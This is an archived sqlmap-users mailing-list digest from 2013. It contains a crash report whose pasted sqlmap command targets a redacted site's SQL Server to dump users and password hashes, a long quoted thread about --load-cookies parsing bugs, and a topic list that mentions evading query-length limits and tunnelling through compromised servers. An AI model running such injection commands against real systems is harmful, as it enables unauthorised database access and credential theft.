Miroslav Stampar

On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:

Hi friend,

Could you help me with this bug?
[22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you. sqlmap version: 1.0-dev Python version: 2.7.3 Operating system: posix Command line: ./sqlmap -u *********************************************** --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft SQL Server --users --passwords Technique: BOOLEAN Back-end DBMS: Microsoft SQL Server (fingerprinted) Traceback (most recent call last): File "./sqlmap", line 87, in main start() File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in start action() File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action conf.dbmsHandler.getPasswordHashes(), "password hash", CONTENT_TYPE.PASSWORDS) File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in getPasswordHashes if user in retrievedUsers: TypeError: unhashable type: 'list' [*] shutting down at 22:54:12 Thanks BOB ------------------ Original ------------------ From: 
"sqlmap-users-request"<sql...@li...>; Date: May 29, 2013 To: "sqlmap-users"<sql...@li...>; Subject: sqlmap-users Digest, Vol 31, Issue 1 Send sqlmap-users mailing list submissions to sql...@li... To subscribe or unsubscribe via the World Wide Web, visit https://lists.sourceforge.net/lists/listinfo/sqlmap-users or, via email, send a message with subject or body 'help' to sql...@li... You can reach the person managing the list at sql...@li... When replying, please edit your Subject line so it is more specific than "Re: Contents of sqlmap-users digest..." Today's Topics: 1. Re: Feature request (David Guimaraes) 2. Re: --load-cookies (Dirk Wetter) 3. Re: --load-cookies (Miroslav Stampar) 4. Re: Patch for /task/<task_id>/delete in clean_filesystem (Miroslav Stampar) 5. Re: --load-cookies (Dirk Wetter) 6. --host parameter (co...@5i...) 7. Sqlmap and direct connect error (???????? ??????) 8. Re: --host parameter (Miroslav Stampar) 9. Re: Sqlmap and direct connect error (Miroslav Stampar) 10. feature request: offline mode for --dns-domain? (buawig) 11. feature request: --dns-domain for non-root users (--dns-port) (buawig) 12. Domain credentials (Brian Milliron) 13. Re: Domain credentials (Brandon Perry) 14. Re: feature request: offline mode for --dns-domain? (Miroslav Stampar) 15. Re: Domain credentials (Miroslav Stampar) 16. Re: feature request: fetch DNS queries from DNS server via HTTP (buawig) 17. Re: feature request: fetch DNS queries from DNS server via HTTP (Miroslav Stampar) 18. MySQL error based technique bug (Konrads Smelkovs) 19. Re: MySQL error based technique bug (Miroslav Stampar) 20. SQLmap crashing (Phillip Wylie) 21. Re: SQLmap crashing (Miroslav Stampar) 22. Custom injection payload in POST (Marcell Fodor) 23. Re: SQLmap crashing (Miroslav Stampar) 24. I got error on windows (warezhacking) 25. Appending to a dump (Stephen Shkardoon) 26. Re: Appending to a dump (Miroslav Stampar) 27. Re: Appending to a dump (Stephen Shkardoon) 28. 
Re: Appending to a dump (Miroslav Stampar) 29. --ignore-404 ? (buawig) 30. PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (buawig) 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar) 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string' from 1 for 1) (Miroslav Stampar) 33. Re: --ignore-404 ? (Miroslav Stampar) 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras) 35. Re: BUG...!!!! o.O (Miroslav Stampar) 36. gun...@gm... wants to follow you. Accept? (gun...@gm...) 37. Direct access to mysql database (Marcell Fodor) 38. Re: Direct access to mysql database (Miroslav Stampar) 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio... (Badoo) 40. Not getting any sensitive data from database (Marcell Fodor) 41. Re: Not getting any sensitive data from database (Miroslav Stampar) 42. unhandled exception (kvasilopoulos) 43. [SQLMAP] Unhandled exception for IPv6 (e.n...@st...) 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) 45. Re: unhandled exception (Miroslav Stampar) 46. Passing SOAPAction in --header (Brandon Perry) 47. Re: Passing SOAPAction in --header (Miroslav Stampar) 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar) 49. Blind SQL Injection question (Guy Dufour) 50. Re: Blind SQL Injection question (Chris Oakley) 51. Re: Passing SOAPAction in --header (Brandon Perry) 52. Re: Passing SOAPAction in --header (Brandon Perry) 53. Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar) 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry) 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Alok Kumar) 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server (Brandon Perry) 57. SQLMAP Bug (Joe O'Hara) 58. Re: SQLMAP Bug (Miroslav Stampar) 59. [CRITICAL] (Thai Thao) 60. Re: [CRITICAL] (Miroslav Stampar) 61. Providing multiple dbms (Sebastian Nerz) 62. 
Re: Providing multiple dbms (Miroslav Stampar) ---------------------------------------------------------------------- Message: 1 Date: Sat, 13 Apr 2013 21:40:39 -0300 From: David Guimaraes <sk...@gm...> Subject: Re: [sqlmap-users] Feature request To: Miroslav Stampar <mir...@gm...> Cc: SqlMap List <sql...@li...> Message-ID: <CAJ...@ma...> Content-Type: text/plain; charset="iso-8859-1" Good question Miroslav.. I tried to think in something that can be implemented without ruin sqlmap query schema, but I could not come to any conclusion... =( The thing is, sqlsus use a different approch to dump the data, making this kind of thing possible... The solution that I found in this particular scenario is to use sqlsus, unfortunately... Regards. David On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <mir...@gm... > wrote: > Hi David. > > And what do you recommend to be done in case of query with length > > max_inj_length? > > Kind regards, > Miroslav Stampar > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote: > >> Hi, I am trying to perform sql injection on a web site but I can not get >> successful due to a size limitation on the query sent to the server. The >> server is limiting the size of query in 512 bytes only and sqlmap do not >> have any customization that allows me to bypass this restriction like >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called "autoconf" >> that measure the permited query size. >> >> There is some chance to put this kind of feature in sqlmap? >> >> Thanks. >> >> -- >> David Gomes Guimar?es >> >> >> ------------------------------------------------------------------------------ >> Own the Future-IntelLevel Up Game Demo Contest 2013 >> Rise to greatness in Intel's independent game demo contest. >> Compete for recognition, cash, and the chance to get your game >> on Steam. $5K grand prize plus 10 genre and skill prizes. >> Submit your demo by 6/6/13. 
http://p.sf.net/sfu/intel_levelupd2d >> _______________________________________________ >> sqlmap-users mailing list >> sql...@li... >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users >> >> -- David Gomes Guimar?es -------------- next part -------------- An HTML attachment was scrubbed... ------------------------------ Message: 2 Date: Mon, 15 Apr 2013 11:36:37 +0200 From: Dirk Wetter <sp...@dr...> Subject: Re: [sqlmap-users] --load-cookies To: Miroslav Stampar <mir...@gm...> Cc: SqlMap List <sql...@li...> Message-ID: <516...@dr...> Content-Type: text/plain; charset=ISO-8859-1 On 04/14/2013 01:14 AM, Miroslav Stampar wrote: > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now? thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file: /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug! Traceback (most recent call last): File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load assert domain_specified == initial_dot AssertionError _warn_unhandled_exception() [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'') the 999.. looks strange to me. > > > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote: > > Hi Dirk. > > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired" > that's true but IMO 0 represents just a session cookie. Example: prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com # HTTP cookie file. # Generated by Wget on 2013-04-15 11:23:13. # Edit at your own risk. 
.bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415 .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314 .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7 .bing.com TRUE / FALSE 0 _HOP .bing.com TRUE / FALSE 0 _FS NU=1 .bing.com TRUE / FALSE 1429089794 _FP EM=1 www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314 prompt% Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there. Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last cookie only for the first 120 tries. Cheers, Dirk > > Kind regards, > Miroslav Stampar > > > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...>> wrote: > > > Hi Miroslav, > > thx for your prompt answer. > > On 04/12/2013 07:45 PM, Miroslav Stampar wrote: > > Hi Dirk. > > > > Could you please get the latest revision and retry it again? > ed5599f: almost the same: with cookie in the header sqlmap takes only this one. > The slight difference seems to be that in the case where I didn't supply a cookie > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore. > > > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours. > > > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great. > > sure, here you go: > > --snip > # Netscape HTTP Cookie File > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie> > [..] > --snap > > They are all session cookies. 
For easier reading here I put some blanks in the line > above, in "cookie-file" there aren't any though. Cookies were generated with > stompy and a shell script (looks he same as with > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>) > > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-) > > > > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc. > > see above. > > Cheers, > > Dirk > > > > > > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>> wrote: > > > > Hi Miroslav, > > > > yes unfortunately. > > > > If I omit the cookie line in the request header completely, sqlmap > > seems to take the first cookie issued by the server with set-cookie (and > > put's it silently in). > > > > Cheers, > > > > Dirk > > > > > > > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote: > > > Hi. > > > > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request? > > > > > > Kind regards, > > > Miroslav Stampar > > > > > > > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>> <mailto:sp...@dr... <mailto:sp...@dr...> <mailto:sp...@dr... <mailto:sp...@dr...>>>> wrote: > > > > > > > > > Hi folks, > > > > > > .... that doesn't work for me. 
It always uses the cookie supplied
> > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > from the 1st server reply is being used)
> > >
> > > So what is wrong in here:
> > >
> > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > --level=2 --risk=2 -r $REQUEST
> > >
> > > The content of the file $REQUEST is:
> > >
> > > POST <URL> HTTP/1.1
> > > Host: <HOST>
> > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > Accept-Language: en-US,en;q=0.5
> > > Accept-Encoding: gzip, deflate
> > > Referer: <Referer>
> > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > Connection: keep-alive
> > > Content-Type: application/x-www-form-urlencoded
> > > Content-Length: 67
> > >
> > > <abunchofpostparams>
> > >
> > >
> > > No hints that cookie-file is not in correct format (I've been through this,
> > > at least I think I so ;) ).
> > >
> > > Any insight would be much appreciated.
> > >
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > > ------------------------------------------------------------------------------
> > > Precog is a next-generation analytics platform capable of advanced
> > > analytics on semi-structured data. The platform includes APIs for building
> > > apps and a phenomenal toolset for data science. Developers can use
> > > our toolset for easy data analysis & visualization. Get a free account!
> > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > _______________________________________________
> > > sqlmap-users mailing list
> > > sql...@li...
> > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> > >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm

------------------------------

Message: 3
Date: Mon, 15 Apr 2013 11:45:19 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --load-cookies
To: Dirk Wetter <sp...@dr...>
Cc: SqlMap List <sql...@li...>
Message-ID: <CA+9yoX0yAGFkCiLuycVqdbm8jvnMeEPgJdXoYZi_4NTW-YQo=Q...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Dirk.

Now that crash should be "patched".

Could you please retry it now and say if the latest revision suits your needs?

Kind regards,
Miroslav Stampar


On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:

>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
> assert domain_specified == initial_dot
> AssertionError
>
> _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com TRUE / FALSE 0 _HOP
> .bing.com TRUE / FALSE 0 _FS NU=1
> .bing.com TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> >
> > >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks he same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > put's it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > > >
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko) Chrome/0.2.149.6 Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think I so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > > ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform capable of advanced
> > > > analytics on semi-structured data. The platform includes APIs for building
> > > > apps and a phenomenal toolset for data science. Developers can use
> > > > our toolset for easy data analysis & visualization. Get a free account!
> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > _______________________________________________
> > > > sqlmap-users mailing list
> > > > sql...@li...
> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > > >
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
> > > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> > >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >

--
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 4
Date: Mon, 15 Apr 2013 11:46:21 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Patch for /task/<task_id>/delete in clean_filesystem
To: Brandon Perry <bpe...@gm...>
Cc: sqlmap users <sql...@li...>
Message-ID: <CA+9yoX3RNQDm=PqT...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi Brandon.

Thank you for your patch and find it now included [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/8853e43616e89f26cfd6d1c1540e02ed6b4ca224


On Sat, Apr 13, 2013 at 8:36 PM, Brandon Perry <bpe...@gm...> wrote:

> Hi, the attached patch fixes an issue with the /task/<task_id>/delete api
> call when self.output_directory is NoneType and clean_system() is called.
>
> --
> http://volatile-minds.blogspot.com -- blog
> http://www.volatileminds.net -- website
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

--
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 5
Date: Mon, 15 Apr 2013 12:19:13 +0200
From: Dirk Wetter <sp...@dr...>
Subject: Re: [sqlmap-users] --load-cookies
To: Miroslav Stampar <mir...@gm...>
Cc: SqlMap List <sql...@li...>
Message-ID: <516...@dr...>
Content-Type: text/plain; charset=ISO-8859-1

Hi Miroslav,

On 04/15/2013 11:45 AM, Miroslav Stampar wrote:
> Hi Dirk.
>
> Now that crash should be "patched".
>
> Could you please retry it now and say if the latest revision suits your needs?

cool, thx. Works!

However (sorry): One needs to omit the cookie in the request header, otherwise it just uses the one supplied by the request.

Then: It doesn't change the cookie. Maybe I was interpreting that not correctly but my point was using the load-cookies option to direct sqlmap to change cookies once in a while (whenever that's gonna be). This is to circumvent restrictions one can encounter otherwise....

Cheers, Dirk

>
> Kind regards,
> Miroslav Stampar
>
>
> On Mon, Apr 15, 2013 at 11:36 AM, Dirk Wetter <sp...@dr...> wrote:
>
>
>
> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
> > Nevertheless, with the latest commit that check should be "neutralized" now. Could you please retry it now?
>
> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib hiccups, using the same file:
>
> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib bug!
> Traceback (most recent call last):
> File "/usr/lib64/python2.7/_MozillaCookieJar.py", line 82, in _really_load
> assert domain_specified == initial_dot
> AssertionError
>
> _warn_unhandled_exception()
> [11:13:26] [CRITICAL] there was a problem loading cookies file ('invalid Netscape format cookies file '/tmp/sqlmapcj-pbP7P1': '<FQDN>\tTRUE\t<PATH>\tTRUE\t9999999999\tJSESSIONID\t6ADFAA167AA89CF993061E5CACEF46C9'')
>
> the 999.. looks strange to me.
>
> >
> >
> > On Sun, Apr 14, 2013 at 12:59 AM, Miroslav Stampar <mir...@gm...> wrote:
> >
> > Hi Dirk.
> >
> > Well, I would say that you have an expired cookie. Do you see that value 0? That value should be a valid UNIX time representing time of cookie expiration. Also, I've just tested that cookie of yours and sqlmap says: "[WARNING] cookie '....' has expired"
> >
>
> that's true but IMO 0 represents just a session cookie. Example:
>
> prompt% wget -q -O /dev/null --keep-session-cookies --save-cookies=/dev/stdout bing.com
> # HTTP cookie file.
> # Generated by Wget on 2013-04-15 11:23:13.
> # Edit at your own risk.
>
> .bing.com TRUE / FALSE 1429089794 SRCHUSR AUTOREDIR=0&GEOVAR=&DOB=20130415
> .bing.com TRUE / FALSE 1429089794 SRCHD D=2781203&MS=2781203&AF=NOFORM
> .bing.com TRUE / FALSE 1429089794 OrigMUID 333995A69E06630B2EB491169F016314%2cfc3b876c239e43d4bfc1544927289abe
> .bing.com TRUE / FALSE 1429089794 MUID 333995A69E06630B2EB491169F016314
> .bing.com TRUE / FALSE 0 _SS SID=B954CB7EDF8643CABAD8013F27A241E7
> .bing.com TRUE / FALSE 0 _HOP
> .bing.com TRUE / FALSE 0 _FS NU=1
> .bing.com TRUE / FALSE 1429089794 _FP EM=1
> www.bing.com FALSE / FALSE 1429089794 SRCHUID V=2&GUID=975091780DFF407DA9DD07139FD97C4D
> www.bing.com FALSE / FALSE 1429089794 MUIDB 333995A69E06630B2EB491169F016314
>
> prompt%
>
> Same parser problem btw if I edit the cookie file and put 1429089794 unix time instead of 0 in there.
>
> Ok: With the prev rev ed5599f it reads this file ok (no session cookies but cookies w/ expiration date) and uses the last
> cookie only for the first 120 tries.
>
> Cheers, Dirk
>
>
> >
> > Kind regards,
> > Miroslav Stampar
> >
> >
> > On Sat, Apr 13, 2013 at 12:54 PM, Dirk Wetter <sp...@dr...> wrote:
> >
> >
> > Hi Miroslav,
> >
> > thx for your prompt answer.
> >
> > On 04/12/2013 07:45 PM, Miroslav Stampar wrote:
> > > Hi Dirk.
> > >
> > > Could you please get the latest revision and retry it again?
> > ed5599f: almost the same: with cookie in the header sqlmap takes only this one.
> > The slight difference seems to be that in the case where I didn't supply a cookie
> > sqlmap doesn't use any cookie at all, i.e. now not the one from the server anymore.
> >
> > >
> > > There was a situation where info messages have been wrongly written that original response contained Set-Cookie in situations like yours.
> > >
> > > In case that everything stays as it is, I'll need to ask you to provide more details. For example, cookie file would be great.
> >
> > sure, here you go:
> >
> > --snip
> > # Netscape HTTP Cookie File
> > <FQDN> \t FALSE \t <path> \t TRUE \t 0 \t JSESSIONID \t <Cookie>
> > [..]
> > --snap
> >
> > They are all session cookies. For easier reading here I put some blanks in the line
> > above, in "cookie-file" there aren't any though. Cookies were generated with
> > stompy and a shell script (looks he same as with
> > wget -S -O /dev/null --keep-session-cookies --save-cookies=<file> <URL>)
> >
> > Again: sqlmap doesn't hiccup/complain while eating my cookies file ;-)
> >
> > >
> > > Also, please make sure that the cookie file contains proper cookie(s) - domain name should be the same as a domain of target, cookie needs to have a proper valid time, etc.
> >
> > see above.
> >
> > Cheers,
> >
> > Dirk
> >
> >
> > >
> > > On Fri, Apr 12, 2013 at 4:50 PM, Dirk Wetter <sp...@dr...> wrote:
> > >
> > > Hi Miroslav,
> > >
> > > yes unfortunately.
> > >
> > > If I omit the cookie line in the request header completely, sqlmap
> > > seems to take the first cookie issued by the server with set-cookie (and
> > > put's it silently in).
> > >
> > > Cheers,
> > >
> > > Dirk
> > >
> > >
> > >
> > > On 04/12/2013 03:24 PM, Miroslav Stampar wrote:
> > > > Hi.
> > > >
> > > > And this is also happening if you are skipping "Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7" from the original request?
> > > >
> > > > Kind regards,
> > > > Miroslav Stampar
> > > >
> > > >
> > > > On Fri, Apr 12, 2013 at 3:10 PM, Dirk Wetter <sp...@dr...> wrote:
> > > >
> > > >
> > > > Hi folks,
> > > >
> > > > .... that doesn't work for me. It always uses the cookie supplied
> > > > (below in $REQUEST, or if I omit the line in $REQUEST the one
> > > > from the 1st server reply is being used)
> > > >
> > > > So what is wrong in here:
> > > >
> > > > cd ~/networking/tools/sqlmap/sqlmap-dev1.0-dev-ea12cce
